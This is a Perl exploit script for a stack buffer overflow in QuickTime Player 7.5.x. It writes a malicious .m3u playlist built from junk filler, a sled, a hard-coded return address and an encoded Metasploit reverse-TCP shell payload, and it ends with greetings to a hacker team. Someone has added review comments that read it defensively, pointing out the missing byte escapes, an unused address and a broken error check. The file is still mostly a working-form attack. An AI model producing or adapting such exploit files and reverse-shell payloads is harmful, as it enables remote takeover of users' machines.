#!/usr/bin/perl
###
# Title : QuickTime Player v 7.5.x (m3u) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote Access and BOF
# Tested on : Windows XP SP3 Français
# Target : QuickTime Player v 7.5.x
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
#
# Review notes (defensive reading of this listing):
#  - The script's only effect beyond console output is writing one local
#    file, Bo0M.m3u, whose body is the concatenation built into $kedans
#    below: a filler run, a second filler run, one packed 32-bit address,
#    then the encoded payload string.  The artifact is therefore a playlist
#    file containing no URLs or paths at all, just one long line of repeated
#    filler followed by a blob -- a shape that is easy to flag when
#    inspecting .m3u files.
#  - Both addresses are hard-coded for one specific build (the header says
#    XP SP3 French), so the file is tied to that environment; presumably
#    ASLR/DEP and an updated or removed player defeat this fixed-address
#    technique (not demonstrated here).
#  - As extracted, the string literals below carry no backslash escapes
#    ("x41", "x90", "x56..."), so in this listing they are printable ASCII
#    text rather than the byte values the author's comments describe.
#  - No `use strict`/`use warnings`; $junk and $kedans are undeclared
#    package globals; the file handle is a bareword opened with a 2-arg,
#    unchecked open (see the notes at the open call).
#
#START SYSTEM /root@MSdos/ :
# cmd.exe built-ins (title/color/cls) invoked through the shell;
# Windows-only and cosmetic.
system("title KedAns-Dz");
system("color 1e");
system("cls");
print " ";
print " |===========================================================| ";
print " |= [!] Name : QuickTime Player v 7.5.x (m3u) / Apple Inc. =| ";
print " |= [!] Exploit : Stack Buffer Overflow =| ";
print " |= [!] Author : KedAns-Dz =| ";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| ";
print " |===========================================================| ";
sleep(2);
print " ";
print " [!] Please Wait Loading... ";
# Payload Parameter (http://www.metasploit.com)
# windows/shell_reverse_tcp - 739 bytes
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
# Per the author's comment above this is a Metasploit reverse-TCP shell
# payload run through the alpha_mixed encoder (output is mostly printable
# alphanumerics), with the connect-back target left at loopback:4444.
# Those connect-back parameters are what an analyst would extract from a
# captured sample.
my $payload = "x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx4d" .
"x38x4ex69x47x70x43x30x45x50x45x30x4dx59x4a" .
"x45x45x61x48x52x43x54x4ex6bx50x52x50x30x4c" .
"x4bx51x42x46x6cx4ex6bx46x32x46x74x4cx4bx50" .
"x72x46x48x46x6fx4fx47x43x7ax51x36x46x51x49" .
"x6fx46x51x4fx30x4ex4cx47x4cx43x51x43x4cx43" .
"x32x44x6cx47x50x4fx31x48x4fx46x6dx43x31x49" .
"x57x48x62x4cx30x51x42x42x77x4cx4bx50x52x42" .
"x30x4cx4bx43x72x45x6cx46x61x4ax70x4cx4bx43" .
"x70x43x48x4ex65x4bx70x42x54x50x4ax45x51x48" .
"x50x46x30x4ex6bx50x48x45x48x4ex6bx51x48x51" .
"x30x45x51x48x53x48x63x47x4cx43x79x4ex6bx47" .
"x44x4ex6bx46x61x4bx66x50x31x4bx4fx44x71x4f" .
"x30x4ex4cx49x51x4ax6fx46x6dx46x61x4fx37x46" .
"x58x4dx30x42x55x4ax54x46x63x43x4dx4cx38x47" .
"x4bx51x6dx44x64x44x35x49x72x43x68x4cx4bx50" .
"x58x45x74x47x71x48x53x51x76x4ex6bx46x6cx42" .
"x6bx4cx4bx42x78x47x6cx45x51x48x53x4ex6bx45" .
"x54x4cx4bx47x71x48x50x4fx79x42x64x44x64x47" .
"x54x51x4bx51x4bx43x51x50x59x43x6ax46x31x4b" .
"x4fx4dx30x50x58x43x6fx43x6ax4cx4bx45x42x48" .
"x6bx4ex66x43x6dx42x48x50x33x44x72x45x50x43" .
"x30x51x78x42x57x42x53x46x52x43x6fx50x54x43" .
"x58x42x6cx44x37x44x66x45x57x49x6fx48x55x48" .
"x38x4cx50x47x71x45x50x47x70x47x59x4bx74x51" .
"x44x42x70x42x48x44x69x4dx50x42x4bx43x30x49" .
"x6fx48x55x50x50x42x70x50x50x42x70x47x30x42" .
"x70x43x70x50x50x43x58x48x6ax44x4fx49x4fx4d" .
"x30x49x6fx4bx65x4ex69x48x47x42x48x43x4fx45" .
"x50x43x30x47x71x43x58x43x32x45x50x44x51x43" .
"x6cx4ex69x4ax46x51x7ax42x30x51x46x43x67x42" .
"x48x4dx49x4ex45x51x64x51x71x49x6fx4ex35x50" .
"x68x42x43x42x4dx42x44x47x70x4cx49x48x63x51" .
"x47x51x47x51x47x50x31x4bx46x51x7ax47x62x51" .
"x49x50x56x4dx32x49x6dx50x66x4fx37x42x64x46" .
"x44x45x6cx47x71x43x31x4cx4dx50x44x51x34x42" .
"x30x4ax66x43x30x43x74x50x54x42x70x43x66x43" .
"x66x51x46x47x36x46x36x42x6ex50x56x46x36x42" .
"x73x43x66x50x68x44x39x48x4cx47x4fx4bx36x4b" .
"x4fx48x55x4cx49x4bx50x50x4ex42x76x43x76x49" .
"x6fx50x30x42x48x43x38x4cx47x47x6dx43x50x49" .
"x6fx4ex35x4fx4bx4ax50x4dx65x4dx72x51x46x51" .
"x78x4dx76x4ex75x4fx4dx4dx4dx4bx4fx48x55x47" .
"x4cx46x66x43x4cx45x5ax4bx30x49x6bx49x70x43" .
"x45x45x55x4dx6bx51x57x44x53x43x42x42x4fx51" .
"x7ax47x70x46x33x4bx4fx49x45x41x41";
#_ End Payload _
# Parameter OverFlow =>
my $eip = pack('V',0x7C86467B); # Jump ESP from kernel32.dll
# NOTE: $eip is never appended to $kedans below; only its length (4) is
# used to size $usmh, so this kernel32 address never reaches the output
# file.  Either the author dropped it deliberately or this is leftover.
my $usmh = "x90" x (50 - length($eip)); # Pack Length x 50
# 50 - 4 = 46 repetitions of the literal "x90".
my $ret = pack('V',0x040904b0); # Jump to ESP from QTOControl.dll
# Little-endian 4-byte pack; this is the only address actually written
# to the file.  Being a fixed module address it is build-specific.
$junk = "x41" x 333 ; # Junk
# 333 repetitions of the literal "x41"; undeclared package global (no `my`).
# immiXing Parameters >>>
$kedans = $junk.$usmh.$ret.$payload ; # Evil KedAns
# Undeclared package global; this single string is the entire file body.
# >> Creating ...
open (FILE ,"> Bo0M.m3u");
# 2-arg open on a bareword handle, return value unchecked: if the file
# cannot be created nothing here notices, and the print below goes to an
# unopened handle.
print FILE $kedans ;
print " File successfully created! " or die print " OpsS! File is Not Created !! ";
# The `or die` binds to the preceding console print, which returns true,
# so the "Not Created" branch is unreachable; the success message says
# nothing about whether the open or the file write actually succeeded.
close (FILE);
# close return value also unchecked (buffered write errors surface here).
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================
